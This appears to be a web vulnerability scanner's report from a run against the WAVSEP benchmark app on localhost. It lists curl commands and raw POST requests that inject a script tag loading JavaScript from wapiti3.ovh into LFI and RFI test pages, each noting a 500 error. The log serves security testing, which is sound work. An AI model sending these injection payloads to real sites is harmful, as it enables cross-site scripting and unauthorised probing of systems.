curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4rx48pj1zz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsv5kvjh1pz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsv5kvjh1pz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws1inkquppz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws1inkquppz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcfyxpzz6kz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcfyxpzz6kz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw18nuzs6mnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw18nuzs6mnz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz8vecrdavz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz8vecrdavz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxd7ezqv95z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxd7ezqv95z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqlmqtnn8ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqlmqtnn8ez.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkc4p6uhr0z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkc4p6uhr0z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwg5jshx0wbz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwg5jshx0wbz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw691b6b6krz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw691b6b6krz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwochaxi696z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwochaxi696z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrcijmdolnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrcijmdolnz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwft4h9naztz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwft4h9naztz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8rdvt58s3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8rdvt58s3z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtmvpizphjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtmvpizphjz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5otmtvdxlz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5otmtvdxlz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnhu1sh2ozz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnhu1sh2ozz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwapdkevk6qz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwapdkevk6qz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfyojg7wubz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfyojg7wubz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws79gcizw5z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws79gcizw5z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcyk201713z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcyk201713z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn4j91onkjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn4j91onkjz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgw48msz4tz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgw48msz4tz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
